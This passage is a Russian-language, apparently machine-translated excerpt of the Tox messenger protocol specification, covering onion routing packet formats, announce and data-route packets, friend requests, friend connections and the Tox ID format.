-> [data][SendbackC[sendbackB[sendbackA]]]-> Node D (end)

Node D
-> [SendbackC[sendbackB[sendbackA]]][response] -> Node C
-> [sendbackB[sendbackA]][response] -> Node B
-> [sendbackA][response] -> Node A
-> [response] -> peer

Случайные открытые ключи в луковых пакетах - это временные открытые ключи, созданные и используемые только для данного лукового пути. Это делается для того, чтобы другим было сложно связать вместе различные пути. Каждый зашифрованный слой должен иметь свой открытый ключ. Именно по этой причине в определениях пакетов, приведенных выше, имеется несколько ключей.
Nonce используется для шифрования всех уровней шифрования. Этот 24-байтовый nonce должен генерироваться случайным образом. Если он генерируется неслучайно и имеет связь с nonce, используемыми для других путей, то можно связать вместе различные луковые пути.

IP_Port - это ip и порт в упакованном формате:

Length| Contents
---|---
1| TOX_AF_INET (2) for IPv4 or TOX_AF_INET6 (10) for IPv6
4 | 16| IP address (4 bytes if IPv4, 16 if IPv6)
12 | 0| Zeroes
2| uint16_t Port

В случае IPv4 формат дополняется 12 байтами нулей, чтобы IPv4 и IPv6 имели одинаковый размер.

IP_Port всегда будет иметь размер 19 байт. Это сделано для того, чтобы было трудно определить, ipv4 или ipv6 находится в пакете, просто посмотрев на размер. 12 байт нулей в ipv4 должны быть установлены в 0 и не должны оставаться неинициализированными, поскольку таким образом может произойти утечка информации, если они останутся неинициализированными. Все числа здесь в формате big endian.
IP_Port в данных sendback может быть в любом формате, лишь бы длина была 19 байт, так как только тот, кто его пишет, может расшифровать его и прочитать, однако, рекомендуется использовать предыдущий формат из-за повторного использования кода. Nonce в данных обратной связи должен быть 24-байтовым nonce.
Каждый слой лука имеет свой упакованный идентификатор, который идентифицирует его, чтобы реализация точно знала, как с ним работать. Обратите внимание, что любые данные, отправляемые обратно, должны быть зашифрованы, выглядеть случайными и не допускать утечки информации, так как все узлы на пути будут видеть их.
Если с полученными луковыми пакетами что-то не так (не удается расшифровать), реализация должна отбросить их.
Реализация должна иметь код для каждого типа пакета, который обрабатывает его, добавляет (или расшифровывает) обратный сигнал и отправляет его следующему узлу на пути. Пакетов много, но реализация должна быть очень простой.
Обратите внимание, что если первым узлом на пути является TCP-реле, TCP-реле должно поместить идентификатор (вместо IP/порта) в sendback, чтобы знать, что любой ответ должен быть отправлен соответствующему peer, подключенному к TCP- реле.
Это объясняет, как создавать луковые пакеты и как они отправляются обратно. Далее речь пойдет о том, что на самом деле отправляется и принимается поверх этих луковых пакетов или путей.

Примечание: nonce - это 24-байтовый nonce.
пакет запроса announce:

Length| Contents
---|---
1| uint8_t (0x83)
24| Nonce
32| A public key (real or temporary)
?| Payload

Открытый ключ - это наш настоящий долгосрочный открытый ключ, если мы хотим объявить о себе, и временный, если мы ищем друзей.
Полезная нагрузка зашифрована частью секретного ключа отправленного открытого ключа, открытым ключом узла D и nonce, и содержит:

Length| Contents
---|---
32| Ping ID
32| Public key we are searching for
32| Public key that we want those sending back data packets to use
8| Data to send back in response

Если ping id равен нулю, ответьте пакетом announce response.
Если ping id совпадает с тем, который узел отправил в ответе announce, а открытый ключ совпадает с искомым, добавьте часть, используемую для отправки данных, в наш список. Если список полон, замените самую дальнюю запись.

данные в пакете запроса маршрутизации:

Length| Contents
---|---
1| uint8_t (0x85)
32| Public key of destination node
24| Nonce
32| Temporary just generated public key
variable| Payload

Полезная нагрузка шифруется с помощью временного секретного ключа, nonce и открытого ключа из пакета ответа анонса узла назначения. Если узел D содержит данные ret для узла, он отправляет материал в этом пакете в качестве данных для маршрутизации ответного пакета в нужный узел.

Данные в предыдущем пакете имеют формат:

Length| Contents
---|---
32| Real public key of sender
variable| Payload

Полезная нагрузка шифруется с помощью реального секретного ключа отправителя, nonce в пакете данных и реального открытого ключа получателя:

Length| Contents
---|---
1| uint8_t id
variable| Data (optional)

Возвратные данные

Length| Contents
---|---
1| uint8_t (0x84)
8| Data to send back in response
24| Nonce
variable| Payload

Полезная нагрузка шифруется с помощью секретного ключа DHT узла D, открытого ключа в запросе и nonce:

Length| Contents
---|---
1| uint8_t is_stored
32| Ping ID or Public Key
variable| Maximum of 4 nodes in packed node format (see DHT)

Пакет содержит ping ID, если is_stored равен 0 или 2, или открытый ключ, который должен быть использован для отправки пакетов данных, если is_stored равен 1.

Если is_stored не 0, это означает, что информация для получения искомого открытого ключа хранится на этом узле. is_stored равно 2 является ответом на попытку пира объявить о себе, чтобы сообщить пиру, что он в настоящее время успешно объявлен.

данные для пакета ответа маршрутизации:

Length| Contents
---|---
1| uint8_t (0x86)
24| Nonce
32| Temporary just generated public key
variable| Payload

Полезная нагрузка шифруется с помощью временного секретного ключа, nonce и открытого ключа из пакета ответа-объявления узла назначения.
Существует 2 типа пакетов запроса и 2 пакета ответа на них. Запрос announce используется для объявления о себе узлу, а пакет announce response используется узлом для ответа на этот пакет. Пакет запроса данных для маршрутизации - это пакет, используемый для отправки пакетов через узел другому узлу, который объявил о себе и который мы нашли. Пакет ответа "данные для маршрутизации" - это то, во что узел преобразует этот пакет.
Чтобы объявить о себе в сети, мы должны сначала найти, используя пакеты объявлений, пиров с открытым ключом DHT, наиболее близким к нашему реальному открытому ключу. Затем мы должны объявить о себе этим одноранговым пользователям. После этого друзья смогут отправлять нам сообщения, используя данные для маршрутизации пакетов, отправляя их этим одноранговым пользователям. Чтобы найти тех, кому мы объявили о себе, наши друзья найдут ближайших к нашему настоящему открытому ключу и спросят их, знают ли они нас. Затем они смогут использовать те пиры, которые нас знают, чтобы отправить нам несколько сообщений, содержащих их открытый ключ DHT (который нам нужно знать, чтобы напрямую подключиться к ним), TCP-реле, к которым они подключены (чтобы мы могли подключиться к ним с помощью этих релеев, если понадобится), и некоторые пиры DHT, к которым они подключены (чтобы мы могли быстрее найти их в DHT).
Пакеты запроса объявления - это те же самые пакеты, которые используются немного по-другому, если мы объявляем о себе или ищем пиров, которые знают одного из наших друзей.
Если мы объявляем о себе, мы должны поместить в пакет наш настоящий долгосрочный открытый ключ и зашифровать его нашим долгосрочным закрытым ключом. Это делается для того, чтобы пир, которому мы объявляем о себе, мог убедиться, что мы действительно владеем этим открытым ключом. Если мы ищем пиров, мы используем временный открытый ключ, который используется только для пакетов, ищущих этого пира, чтобы утечка информации была как можно меньше. ping_id - это 32-байтовое число, которое посылается нам в ответе на объявление, а мы должны отправить его обратно пиру в другом запросе на объявление. Это сделано для того, чтобы люди не могли легко объявлять о себе много раз, так как они должны доказать, что могут отвечать на пакеты от пира, прежде чем пир позволит им объявить о себе. Этот ping_id устанавливается в 0, если ничего не известно.
Открытый ключ, который мы ищем, устанавливается как наш долгосрочный открытый ключ, когда мы объявляем себя, и как долгосрочный открытый ключ друга, которого мы ищем, если мы ищем пиров.
Когда мы объявляем о себе, открытый ключ, который мы хотим, чтобы другие использовали для отправки нам данных, устанавливается как временный открытый ключ, и мы используем закрытую часть этого ключа для расшифровки данных маршрутизации пакетов, отправленных нам. Этот открытый ключ служит для того, чтобы предотвратить сохранение пирами старых данных маршрутизации пакетов из предыдущих сессий и возможность их повторного воспроизведения в будущих сессиях Tox. Этот ключ устанавливается на ноль при поиске пиров.
Данные sendback - это 8-байтовое число, которое будет отправлено обратно в ответе пакета announce. Его цель - узнать, на какой пакет запроса объявления отвечает ответ, и, следовательно, его местоположение в незашифрованной части ответа. Это необходимо в toxcore для поиска и проверки информации о пакете, чтобы расшифровать его и правильно обработать. Toxcore использует его как индекс для своего специального массива ping_array.
Почему бы нам не использовать разные пакеты вместо того, чтобы иметь один запрос пакета объявления и один ответ, который делает все? Так возможным злоумышленникам гораздо сложнее понять, объявляем ли мы о себе или ищем друзей, поскольку пакеты для обоих случаев выглядят одинаково и имеют одинаковый размер.
Незашифрованная часть пакета announce response содержит данные sendback, которые были отправлены в запросе, на который этот пакет отвечает, и 24-байтовый случайный nonce, используемый для шифрования зашифрованной части.
Число is_stored имеет значение 0, 1 или 2. 0 означает, что открытый ключ, который искался в запросе, не хранится и не известен этому аналогу. 1 означает, что он есть, а 2 означает, что мы успешно объявлены на этом узле. И 1, и 2 нужны для того, чтобы при перезапуске клиентов можно было повторно объявить, не дожидаясь тайм-аута предыдущего объявления. В противном случае это было бы невозможно, поскольку клиент получил бы ответ 1 без ping_id, который необходим для успешного повторного объявления.
Когда число is_stored равно 0 или 2, следующие 32 байта - это ping_id. Когда is_stored равен 1, он соответствует открытому ключу (открытому ключу отправки данных, установленному другом в его запросе объявления), который должен использоваться для шифрования и отправки данных другу.
Затем к ответу прикрепляются необязательные максимум 4 узла в формате упакованных узлов DHT (см. DHT), которые обозначают 4 пира DHT с открытыми ключами DHT, наиболее близкими к искомому открытому ключу в запросе объявления, известному пиру (см. DHT). Для поиска этих пиров toxcore использует ту же функцию, что и для поиска пиров для ответов get node DHT. Пиры, желающие объявить о себе или ищущие пиров, которые "знают" их друзей, будут рекурсивно запрашивать все более близких пиров, пока не найдут наиболее близкого из них, а затем либо объявят о себе им, либо просто будут пинговать их время от времени, чтобы узнать, можно ли связаться с их другом. Обратите внимание, что функция расстояния, используемая для этого, такая же, как и в Tox DHT.
Пакеты запроса данных для маршрутизации - это пакеты, используемые для отправки данных непосредственно другому peer через узел, который знает этого peer. Открытый ключ - это открытый ключ конечного пункта назначения, куда мы хотим отправить пакет (настоящий открытый ключ нашего друга). Nonce - это 24-байтовый случайный nonce, а открытый ключ - это случайный временный открытый ключ, используемый для шифрования данных в пакете и, если возможно, только для отправки пакетов этому другу (мы хотим, чтобы в сеть попадало как можно меньше информации, поэтому мы используем временные открытые ключи, так как не хотим, чтобы одноранговые пользователи видели одинаковые открытые ключи и могли связать все вместе). Данные - это зашифрованные данные, которые мы хотим отправить сверстнику с открытым ключом.
Пакеты ответа на маршрут - это просто последние элементы (nonce, открытый ключ, зашифрованные данные) пакета запроса данных на маршрут, скопированные в новый пакет и отправленные по назначению.
Для обработки пакетов onion announce, toxcore сначала получает пакет announce и расшифровывает его.
Toxcore генерирует ping_ids, беря 32-байтный sha-хэш текущего времени, несколько секретных байт, сгенерированных при создании экземпляра, текущее время, деленное на 20-секундный тайм-аут, открытый ключ запрашивающего и ip/порт источника, с которого был получен пакет. Поскольку ip/порт, с которого был получен пакет, указан в ping_id, пакеты анонса, отправляемые с ping id, должны быть отправлены по тому же пути, что и пакет, от которого мы получили ping_id, иначе анонс будет неудачным.
Причина 20-секундного таймаута в Toxcore заключается в том, что он дает разумное время (от 20 до 40 секунд) для того, чтобы пир объявил о себе, учитывая при этом все возможные задержки с некоторыми дополнительными секундами.
Toxcore генерирует 2 разных ping id, первый генерируется с текущим временем (разделенным на 20), а второй - с текущим временем + 20 (разделенным на 20). Затем эти два ping id сравниваются с ping id в полученных пакетах. Причина в том, что хранение каждого полученного ping id может быть дорогостоящим и сделать нас уязвимыми к DoS-атаке. Этот метод гарантирует, что другая сторона не может генерировать ping_ids и должна запрашивать их. Причина для 2 ping_ids в том, что мы хотим убедиться, что тайм-аут составляет не менее 20 секунд и не может быть равен 0.
Если один из двух ping_ids равен открытому ключу, используемому для шифрования пакета анонса (pk, которым пир объявляет себя), то открытый ключ и данные отката сохраняются в структуре данных, используемой для хранения анонсированных пиров. Если реализация имеет ограничение на количество записей, которые она может хранить, она должна хранить только те записи, которые находятся ближе всего (определяется функцией расстояния DHT) к ее открытому ключу DHT. Если запись уже есть, информация будет просто обновлена новой, а таймаут для этой записи будет сброшен.
Toxcore имеет тайм-аут в 300 секунд для записей анонса, после чего они удаляются, что достаточно долго, чтобы убедиться, что записи не истекают преждевременно, но недостаточно долго, чтобы пиры оставались анонсированными в течение длительного времени после отключения.
Затем Toxcore копирует 4 узла DHT, ближайших к искомому открытому ключу, в новый пакет (ответ).
Toxcore посмотрит, есть ли искомый открытый ключ в структуре данных. Если нет, то он скопирует первый сгенерированный ping_id (тот, который был сгенерирован в текущее время) в ответ, установит число is_stored в 0 и отправит пакет обратно.
Если открытый ключ находится в структуре данных, то будет проверено, равен ли открытый ключ, использованный для шифрования пакета announce, объявленному открытому ключу, если нет, то это означает, что пир ищет пир и что нам это известно. Это означает, что is_stored устанавливается в 1, и открытый ключ данных обратной отправки в записи анонса копируется в пакет.
Если он (ключ, используемый для шифрования пакета объявления) равен (объявленному открытому ключу, который также является "открытым ключом, который мы ищем" в пакете объявления), что означает, что пир объявляет о себе и для него существует запись, то открытый ключ данных, отправляемых обратно, проверяется на то, равен ли он тому, который был в пакете. Если он не равен, это означает, что он устарел, возможно, потому что экземпляр toxcore анонсирующего пира был перезапущен и поэтому его is_stored установлен в 0. Если он равен, это означает, что пир анонсирован правильно, поэтому is_stored установлен в 2. Затем первый сгенерированный ping_id копируется в пакет.
После создания пакета генерируется случайный 24-байтовый nonce, пакет шифруется (общий ключ, используемый для расшифровки запроса, может быть сохранен и использован для шифрования ответа, чтобы избежать дорогостоящей операции получения ключа), данные для отправки обратно копируются в незашифрованную часть, и пакет отправляется обратно как пакет ответа onion.
Для того чтобы объявить о себе с помощью пакетов onion announce, toxcore сначала берет пиров DHT, выбирает случайных и строит с ними луковые пути, сохраняя 3 узла, называя это путем, генерируя некоторые пары ключей для шифрования луковых пакетов и используя их для отправки луковых пакетов. Если пир подключен только по TCP, начальными узлами будут загрузочные узлы и подключенные TCP-реле (для первого пира в пути). Как только пир подключится к луку, он может пополнить свой список известных пиров за счет пиров, отправленных в ответах анонса, если это необходимо.
Луковые пути имеют различные таймауты в зависимости от того, является ли путь подтвержденным или неподтвержденным. Неподтвержденные пути (пути, от которых ядро никогда не получало ответов) имеют тайм-аут 4 секунды с 2 попытками, прежде чем они будут признаны нерабочими. Это связано с тем, что из-за состояния сети может существовать большое количество вновь созданных путей, которые не работают, и поэтому их многократные попытки приведут к тому, что поиск работающего пути займет гораздо больше времени. Таймаут для подтвержденного пути (от которого был получен ответ) составляет 10 секунд при 4 попытках без ответа. Максимальное время жизни подтвержденного пути составляет 1200 секунд, чтобы затруднить возможные атаки деанонимизации.
Toxcore сохраняет максимум 12 путей: 6 путей зарезервированы для объявления о себе, а 6 других используются для поиска друзей. Возможно, это не самый безопасный способ (некоторые узлы могут связать друзей вместе), однако он гораздо более производительный, чем использование разных путей для каждого друга. Главное преимущество заключается в том, что объявление и поиск осуществляются по разным путям, что затрудняет определение того, что пир с настоящим открытым ключом X дружит с Y и Z. Необходимы дополнительные исследования, чтобы найти лучший способ сделать это. Сначала в toxcore были разные пути для каждого друга, однако это означало, что каждый путь друга почти никогда не использовался (и не проверялся). При использовании небольшого количества путей для поиска требуется меньше ресурсов для поиска хороших путей. Используется 6 путей, потому что 4 было слишком мало и вызывало некоторые проблемы с производительностью, потому что в начале требовалось больше времени для поиска хороших путей, так как одновременно можно было попробовать только 4. Слишком большое число означает, что каждый путь используется (и тестируется) меньше. Причина, по которой число одинаково для обоих типов путей, заключается в упрощении кода.
Для поиска/объявления о себе пирам toxcore хранит 8 ближайших пиров для каждого ключа, по которому он ищет (или объявляет о себе). Чтобы заполнить их, он начинает с отправки запросов announce случайным пирам для всех открытых ключей, которые он ищет. Затем он рекурсивно ищет все более и более близких пиров (функция расстояния DHT), пока не найдет ни одного. Важно убедиться, что он не слишком агрессивен в поиске пиров, так как некоторые из них могут больше не быть онлайн, но пиры могут все еще посылать ответы announce со своей информацией. Toxcore хранит списки последних пингованных узлов для каждого искомого ключа, чтобы не пинговать мертвые узлы слишком агрессивно.
Toxcore решает, будет ли он посылать анонс-пакет одному из 4 пиров в анонс- ответе, проверяя, будет ли этот пир сохранен как один из 8 ближайших пиров, если он ответит; если нет, то он не посылает анонс-запрос, если да, то посылает.
Пиры помещаются в массив 8 ближайших пиров, только если они отвечают на запрос объявления. Если пир не отвечает на 3 запроса анонса, то считается, что его время истекло, и он удаляется.
Причина, по которой количество пиров равно 8, заключается в том, что меньшее число может сделать поиск и анонсирование слишком ненадежными, а большее число

слишком требовательным к пропускной способности/ресурсам.
Toxcore использует ping_array (см. ping_array) для 8-байтовых данных отсылки в пакетах announce для хранения информации, необходимой для обработки ответа (ключ для расшифровки, зачем он был отправлен? (чтобы объявить о себе или для поиска? Для какого ключа? и некоторая другая информация)). В целях безопасности он проверяет, что пакет был получен с правильного ip/порта и проверяет, является ли ключ в незашифрованной части пакета правильным открытым ключом.
Для пиров, которым мы объявляем о себе, если мы не объявлены, toxcore пытается каждые 3 секунды объявить о себе им, пока они не ответят, что мы объявили о себе, затем toxcore посылает пакет запроса объявления каждые 15 секунд, чтобы проверить, объявлены ли мы еще и повторно объявить о себе в то же время. Таймаут в 15 секунд означает, что ping_id, полученный в последнем пакете, не успеет истечь (минимальный таймаут 20 секунд), прежде чем он будет отправлен повторно через 15 секунд. Toxcore посылает каждый пакет announce с ping_id, ранее полученным от этого пира с тем же путем (если это возможно).
Для друзей все немного иначе. Важно начать поиск друзей после того, как мы полностью объявлены. Если предположить, что сеть идеальна, нам нужно будет выполнять поиск открытых ключей друзей только при первом запуске экземпляра (или при переходе в автономный режим и снова в автономный), так как пиры, запускающиеся после нас, смогут найти нас сразу же, просто выполнив поиск. Если мы начнем поиск друзей после объявления, то предотвратим сценарий, когда два друга одновременно запускают свои клиенты, но не могут сразу же найти друг друга, потому что начинают поиск друг друга, пока они еще не объявили себя.
По этой причине после того, как пир успешно объявлен в течение 17 секунд, пакеты объявления посылаются агрессивно каждые 3 секунды каждому известному близкому пиру (в списке из 8 пиров) для агрессивного поиска пиров, которые знают пира, которого мы ищем.
Существуют и другие способы, которые могут быть реализованы и которые все еще будут работать, но если вы создаете свою собственную реализацию, имейте в виду, что эти способы, скорее всего, не являются наиболее оптимизированными.
Если мы находим пиров (более 1), которые знают друга, мы отправляем им пакет данных onion с нашим открытым ключом DHT, до 2 TCP-реле, к которым мы подключены, и 2 близких нам пиров DHT, чтобы помочь другу подключиться к нам.
Луковые пакеты данных - это пакеты, отправляемые в качестве данных для маршрутизации пакетов.

Луковые пакеты данных:

Length| Contents
---|---
32| Long term public key of sender
variable| Payload

Полезная нагрузка шифруется долгосрочным закрытым ключом отправителя, долгосрочным открытым ключом получателя и nonce, используемым в пакете запроса данных для маршрутизации, который используется для отправки этого пакета данных onion (экономится 24 байта).

Пакет открытого ключа DHT:

Length| Contents
---|---
1| uint8_t (0x9c)
8| uint64_t no_replay
32| Our DHT public key
[39, 204]| Maximum of 4 nodes in packed format

Пакет будет принят, только если число no_replay больше числа no_replay в последнем полученном пакете.
Узлы, отправленные в этом пакете, имеют TCP, чтобы друг мог подключиться к нам.
Зачем еще один уровень шифрования? Нам нужно доказать получателю, что мы владеем долгосрочным открытым ключом, о котором мы говорим, когда отправляем ему наш открытый ключ DHT. Запросы друзей также отправляются с помощью пакетов данных onion, но их точный формат объясняется в Messenger.
Число no_replay - это защита на случай, если кто-то попытается воспроизвести старый пакет, и должно быть установлено на постоянно увеличивающееся число. Оно состоит из 8 байт, поэтому в качестве значения следует задать монотонное время высокого разрешения.
Мы отправляем этот пакет каждые 30 секунд, если есть более одного peer (из 8), который говорит, что наш друг объявлен на них. Этот пакет также может быть отправлен через модуль DHT как пакет запроса DHT (см. DHT), если мы знаем открытый ключ DHT друга и ищем его в DHT, но еще не соединились с ним. 30 секунд - это разумный тайм-аут, чтобы не переполнять сеть большим количеством пакетов и в то же время быть уверенным, что другой в конечном итоге получит пакет. Поскольку пакеты посылаются через каждый пир, который знает друга, повторная отправка сразу же без ожидания имеет высокую вероятность неудачи, так как вероятность потери пакетов со всеми (до 8) отправленными пакетами низка.
При отправке в качестве пакета запроса DHT (это данные, отправленные в пакете запроса DHT):

Length| Contents
---|---
1| uint8_t (0x9c)
32| Long term public key of sender
24| Nonce
variable| Encrypted payload

Полезная нагрузка шифруется долгосрочным закрытым ключом отправителя, долгосрочным открытым ключом получателя и ключом nonce, и содержит пакет открытых ключей DHT.
При отправке в качестве пакета запроса DHT пакет открытых ключей DHT (перед отправкой в качестве данных пакета запроса DHT) шифруется долгосрочными ключами отправителя и получателя и помещается в этот формат. Это делается по той же причине, что и двойное шифрование пакета данных onion.
Toxcore пытается повторно отправить этот пакет через DHT каждые 20 секунд. 20 секунд - это разумная скорость повторной отправки, которая не является слишком агрессивной.
В Toxcore есть обработчик пакетов запросов DHT, который передает полученные пакеты открытых ключей DHT из модуля DHT в этот модуль.
Если мы получаем пакет с открытым ключом DHT, мы сначала проверяем, является ли этот DHT-пакет от друга, если он не от друга, он будет отброшен. Затем будет проверен параметр no_replay, чтобы убедиться, что он хороший и во время сессии не было получено пакетов с меньшим значением. Ключ DHT, узлы TCP в упакованных узлах и узлы DHT в упакованных узлах будут переданы соответствующим модулям. Тот факт, что у нас есть открытый ключ DHT друга, означает, что этот модуль достиг своей цели.
Если друг находится в сети и подключен к нам, луковица остановит все свои действия для этого друга. Если пир перейдет в автономный режим, он возобновит поиск друга, как если бы toxcore был только что запущен.
Если toxcore выйдет из сети (трафик лука отсутствует в течение 20 секунд), toxcore агрессивно объявит о себе и начнет поиск друзей, как будто он только что был запущен.

12 Запросы друзей

Когда пользователь Tox добавляет кого-либо с помощью Tox, toxcore попытается отправить запрос на дружбу этому человеку. Запрос на дружбу содержит долгосрочный открытый ключ отправителя, номер nospam и сообщение.

Передача долгосрочного открытого ключа является основной целью запроса на дружбу, так как это то, что нужно коллеге, чтобы найти и установить соединение с отправителем. Долгосрочный открытый ключ - это то, что получатель добавляет в свой список друзей, если он принимает запрос на дружбу.

nospam - это номер, используемый для того, чтобы предотвратить спам в сети с действительными запросами друзей. Оно гарантирует, что только те люди, которые видели Tox ID пира могут отправить ему запрос на дружбу. nospam - это один из компонентов Tox ID.

nospam - это число или список чисел, заданный пиром. Только полученные запросы на дружбу, содержащие nospam, заданный пиром, отправляются на клиент для принятия или отклонения пользователем. nospam предотвращает отправку запросов на дружбу случайными пользователями в сети, не являющимися друзьями. nospam недостаточно длинный, чтобы быть безопасным, а значит, чрезвычайно устойчивый злоумышленник может умудриться послать кому-то спам-запрос на дружбу. 4 байта достаточно много для предотвращения спама от случайных пользователей в сети. nospam также может позволить пользователям Tox выдавать различные Tox ID и даже менять Tox ID, если кто-то найдет Tox ID и решит отправить ему сотни спам-запросов на дружбу. Изменение nospam'а остановило бы входящую волну спам- запросов друзей без каких-либо негативных последствий для списка друзей пользователя. Например, если бы пользователям пришлось изменить свой открытый ключ, чтобы предотвратить получение запросов на дружбу, это означало бы, что им пришлось бы отказаться от всех своих текущих друзей, поскольку друзья привязаны к открытому ключу. nospam не используется вообще, когда друзья добавлены друг к другу, поэтому его изменение не будет иметь никаких негативных последствий.

Запрос друга:

[uint32_t nospam][Сообщение (UTF8) 1 - ONION_CLIENT_MAX_DATA_SIZE байт].

Пакет запроса друга при отправке в виде пакета данных onion:

[uint8_t (32)][Запрос друга]

Пакет запроса друга при отправке в виде пакета данных net_crypto (Если мы напрямую связаны с peer из-за группового чата, но не являемся его друзьями):

[uint8_t (18)][Friend request].

Когда друг добавляется в toxcore с его Tox ID и сообщением, он добавляется в friend_connection, а затем toxcore пытается отправить запрос на дружбу.
При отправке запроса на дружбу toxcore будет проверять, не подключен ли уже тот, кому отправляется запрос на дружбу, используя соединение net_crypto, что может произойти, если оба находятся в одном групповом чате. Если это так, запрос на дружбу будет отправлен как пакет net_crypto, используя это соединение. Если нет, он будет отправлен как пакет данных onion.
Луковые пакеты данных содержат настоящий открытый ключ отправителя, и если соединение net_crypto установлено, это означает, что пир знает наш настоящий открытый ключ. Вот почему запрос на дружбу не обязательно должен содержать реальный открытый ключ отправителя.
Запросы на дружбу отправляются с экспоненциально возрастающим интервалом в 2 секунды, 4 секунды, 8 секунд и т.д. в toxcore. Это сделано для того, чтобы запросы на дружбу получали повторные отправки, но в конечном итоге они будут отправляться с такими большими интервалами, что, по сути, истекут. У отправителя нет возможности узнать, отклонил ли он запрос на дружбу, поэтому запросы на дружбу должны каким-то образом истекать. Обратите внимание, что интервал - это минимальный тайм-аут, если toxcore не может отправить запрос на дружбу, он будет пытаться снова, пока ему не удастся его отправить. Одной из причин невозможности отправить запрос друга может быть то, что луковица не нашла друга в луковице и поэтому не может отправить ему пакет данных.
Полученные запросы друзей передаются клиенту, клиент должен показать сообщение с запросом друга пользователю и спросить пользователя, хочет ли он принять запрос друга или нет. Запрос на дружбу принимается путем добавления в друзья пользователя, отправившего запрос на дружбу, и отклоняется путем простого игнорирования запроса.
Запросы на дружбу отправляются несколько раз, что означает, что для того, чтобы предотвратить отправку одного и того же запроса на дружбу клиенту несколько раз, toxcore хранит список последних реальных открытых ключей, от которых он получил запросы на дружбу, и отбрасывает все полученные запросы на дружбу от реального открытого ключа, который находится в этом списке. В toxcore этот список представляет собой простой круговой список. Есть много способов улучшить его и сделать более эффективным, так как круговой список не очень эффективен, но пока что он хорошо работает в toxcore.
Запросы друзей с открытых ключей, которые уже добавлены в список друзей, также должны отбрасываться.

13 Дружеское соединение

friend_connection - это модуль, который располагается поверх модулей DHT, Onion и net_crypto и обеспечивает связь между ними.
Друзья в friend_connection представлены их реальным открытым ключом. Когда друг добавляется в friend_connection, для него создается запись поиска в onion. Это означает, что модуль onion начнет искать этого друга и отправит ему свой открытый ключ DHT, а также TCP-реле, к которым он подключен, если соединение возможно только по TCP.
Как только onion возвращает открытый ключ DHT друга, открытый ключ DHT сохраняется, добавляется в список друзей DHT и создается новое соединение net_crypto. Любые TCP-реле, возвращенные луком для этого друга, передаются в соединение net_crypto.
Если DHT установит прямое UDP-соединение с другом, friend_connection передаст IP/порт друга в net_crypto, а также сохранит его, чтобы использовать для повторного соединения с другом в случае разрыва связи.
Если net_crypto обнаружит, что у друга другой открытый ключ DHT, что может произойти, если друг перезапустил свой клиент, net_crypto передаст новый открытый ключ DHT модулю onion и удалит запись DHT для старого открытого ключа DHT и заменит его новым. Текущее соединение net_crypto также будет уничтожено и будет создано новое с правильным открытым ключом DHT.
Когда соединение net_crypto для друга выходит в сеть, friend_connection сообщит модулю onion, что друг в сети, чтобы он мог прекратить тратить ресурсы на его поиск. Когда соединение с другом переходит в автономный режим, friend_connection сообщает об этом onion-модулю, чтобы он мог снова начать поиск друга.
Существует 2 типа пакетов данных, отправляемых друзьям с помощью соединения net_crypto, обрабатываемых на уровне friend_connection: пакеты Alive и пакеты TCP relay. Пакеты Alive - это пакеты, в которых идентификатор пакета или первый байт данных (единственный байт в этом пакете) равен 16. Они используются для того, чтобы проверить, находится ли другой друг все еще в сети. net_crypto не имеет таймаута при установлении соединения, поэтому таймаут отлавливается с помощью этого пакета. В toxcore этот пакет отправляется каждые 8 секунд. Если ни один из этих пакетов не получен в течение 32 секунд, соединение прерывается и завершается. Эти цифры, похоже, вызывают меньше всего проблем, а 32 секунды - не слишком большой срок, так что если друг отключится, toxcore не будет ошибочно считать, что он находится в сети слишком долго. Обычно, когда друг выходит из сети, он успевает послать пакет disconnect в соединении net_crypto, что делает его неактивным почти мгновенно.
Таймаут для прекращения повторных попыток соединения с другом путем создания новых net_crypto соединений, когда старое соединение разрывается, в toxcore такой же, как и таймаут для DHT пиров (122 секунды). Однако он рассчитывается от последнего времени получения открытого ключа DHT для друга или времени, когда соединение net_crypto друга перешло в оффлайн после того, как он был онлайн. Наибольшее время используется для расчета таймаута. net_crypto соединения будут воссоздаваться (если соединение не удалось) до этого таймаута.
friend_connection отправляет список из 3 ретрансляторов (столько же, сколько целевое количество TCP-релейных соединений в TCP_connections) каждому подключенному другу каждые 5 минут в toxcore. Непосредственно перед отправкой ретрансляторов они ассоциируются с текущим соединением net_crypto->TCP_connections. Это облегчает соединение двух друзей с помощью ретрансляторов, так как друг, получивший пакет, свяжет отправленный ретранслятор с соединением net_crypto, с которого он его получил. Когда обе стороны сделают это, они смогут соединиться друг с другом с помощью ретрансляторов. Идентификатор пакета или первый байт пакета share relay packets - 0x11. Затем следуют некоторые TCP-реле, хранящиеся в формате упакованного узла.

Length| Contents
---|---
1| uint8_t (0x11)
variable| TCP relays in packed node format (see DHT)

Если локальные IP получены как часть пакета, локальный IP будет заменен на IP аналога, отправившего ретрансляцию. Это происходит потому, что мы предполагаем, что это лучший способ попытаться подключиться к TCP-реле. Если пир, отправивший реле, использует локальный IP, то для подключения к реле следует использовать отправленный локальный IP.
Все остальные пакеты данных передаются friend_connection до верхнего модуля Messenger. Он также разделяет пакеты с потерями и без потерь с помощью net_crypto.
Friend connection заботится об установлении соединения с другом и предоставляет верхнему уровню Messenger простой интерфейс для получения и отправки сообщений, добавления и удаления друзей, а также для того, чтобы узнать, подключен ли друг (онлайн) или не подключен (офлайн).

14 Tox ID

Tox ID используется для идентификации сверстников, чтобы их можно было добавить в друзья в Tox. Чтобы добавить друга, пользователь Tox должен иметь его Tox ID. Tox ID содержит долгосрочный открытый ключ пира (32 байта), затем 4-байтовое значение nospam (см.: friend_requests) и 2-байтовую контрольную сумму XOR. Способ отправки Tox ID другим зависит от пользователя и клиента, но рекомендуемый способ - закодировать его в шестнадцатеричном формате и попросить пользователя вручную отправить его другу с помощью другой программы.

Tox ID:

View attachment 54378

Length| Contents
---|---
32| long term public key
4| nospam
2| checksum

Контрольная сумма вычисляется путем XOR первого двух байтов ID со следующими двумя байтами, затем со следующими двумя байтами, пока все 36 байтов не будут XOR вместе. Затем результат добавляется в конец и образует Tox ID.
Пользователь должен убедиться, что Tox ID не будет перехвачен и заменен в пути на другой Tox ID, что означает, что друг подключится не к пользователю, а к злоумышленнику, хотя при принятии разумных мер предосторожности это выходит за рамки Tox. Tox предполагает, что пользователь убедился в том, что он использует правильный Tox ID, принадлежащий указанному лицу, для добавления друга.

15 Мессенджер

Messenger - это модуль, находящийся на вершине всех остальных модулей. Он находится на вершине friend_connection в иерархии toxcore.
